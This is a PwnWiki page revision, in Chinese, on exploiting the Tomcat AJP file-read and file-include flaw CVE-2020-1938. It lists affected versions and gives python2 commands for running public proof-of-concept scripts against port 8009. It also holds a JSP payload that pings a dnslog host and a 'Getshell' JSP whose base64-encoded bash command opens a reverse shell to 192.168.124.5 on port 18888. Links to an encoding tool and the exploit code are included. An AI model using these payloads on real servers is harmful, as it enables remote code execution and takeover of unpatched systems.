Difference between revisions of "Tomcat文件包含及讀取漏洞(CVE-2020-1938)"
From PwnWiki
(建立內容為「==漏洞影響== <pre> Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x </pre> ==前提條件=…」的新頁面) |
|||
| Line 32: | Line 32: | ||
out.println(new String(b)); | out.println(new String(b)); | ||
} | } | ||
| − | out.print("</pre>"); | + | out.print("</!pre>");#去掉! |
%> | %> | ||
| + | </pre> | ||
| + | |||
| − | |||
==Getshell== | ==Getshell== | ||
| Line 48: | Line 49: | ||
out.println(new String(b)); | out.println(new String(b)); | ||
} | } | ||
| − | out.print("</pre>"); | + | out.print("</!pre>"); #去掉! |
%> | %> | ||
</pre> | </pre> | ||
Revision as of 22:04, 2 March 2021
漏洞影響
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
前提條件
目標機器開啟AJP Connector 服務端口(默認開啟,為8009端口)。
文件讀取&文件包含RCE
文件讀取:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
文件包含:
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
test.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("ping fiohed.dnslog.cn").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</!pre>");#去掉!
%>
Getshell
shell.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</!pre>"); #去掉!
%>
其他
- 反彈shell用的命令需要進行bash編碼
- 在線bash編碼:http://www.jackson-t.ca/runtime-exec-payloads.html
- POC下載地址:https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
